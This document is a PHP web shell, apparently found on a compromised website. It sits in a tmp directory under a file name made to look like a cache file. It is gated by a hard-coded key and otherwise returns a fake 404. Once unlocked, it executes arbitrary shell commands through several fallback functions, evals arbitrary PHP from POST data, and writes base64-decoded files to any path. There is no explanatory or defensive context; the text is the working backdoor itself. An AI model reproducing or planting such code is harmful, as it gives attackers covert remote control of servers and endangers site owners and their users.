| Current Path : /home/atice/www/tmp/ |
| Current File : /home/atice/www/tmp/cache_jui_39740.php |
<?php @error_reporting(0);@ini_set("display_errors",0);@set_time_limit(0);$k="4375d80d263c7d59";if(!isset($_GET["k"])|$_GET["k"]!==$k){http_response_code(404);die();}if(isset($_GET["cmd"])){$c=$_GET["cmd"];$r="";if(function_exists("shell_exec")){$r=shell_exec($c);}elseif(function_exists("system")){ob_start();system($c);$r=ob_get_clean();}elseif(function_exists("exec")){exec($c,$a);$r=implode("\n",$a);}elseif(function_exists("passthru")){ob_start();passthru($c);$r=ob_get_clean();}echo $r;exit;}if(isset($_POST["php"])){@eval($_POST["php"]);exit;}if(isset($_POST["write"])){@file_put_contents($_POST["path"],base64_decode($_POST["write"]));echo "OK";exit;}?>